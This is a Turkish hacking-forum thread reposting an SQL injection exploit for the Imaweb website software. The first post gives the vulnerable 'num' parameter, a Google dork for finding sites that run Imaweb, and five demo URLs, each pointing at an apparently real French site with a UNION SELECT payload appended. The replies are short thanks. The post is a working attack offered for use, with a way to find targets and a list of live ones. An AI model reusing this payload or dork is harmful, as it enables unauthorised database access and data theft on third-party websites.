Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Imaweb SQL injection Vulnerability
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 121
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Imaweb SQL injection Vulnerability
20.01.2014 09:22




Exploit Title : imaweb SQL injection vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://www.imaweb.fr
Google Dork : intext:Réalisation du site Internet par Imaweb
Date: 2013-12-25
Tested on: Windows 7
discovered by :
ACC3SS

Location :

PHP Kod:
localhost/public/index.php?act=photo_afficher&code=pub_phototheque2&num=[Sql
Injection


Demo:

PHP Kod:
http://www.avajaXXn.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version(
),4,5,6,7–

http
://www.auzXay.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version()

,4,5,6,7–

http
://www.roumeXgoux.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,versio

n(),4,5,6,7–

http
://www.oxygXeneinsertion.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2

,version(),4,5,6,7–

http
://www.petXersbach.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,vers

ion(),4,5,6,7– 


Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,050 / 1,050
Deneyim: 1 / 100
Rep Sayısı: 1038
Mesaj Sayısı: 2996
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: Imaweb SQL injection Vulnerability
20.01.2014 11:58
eline sağlık Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı:
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #3
Cvp: Imaweb SQL injection Vulnerability
21.01.2014 19:17
Eyvallah


Alinti



1 Ziyaretçi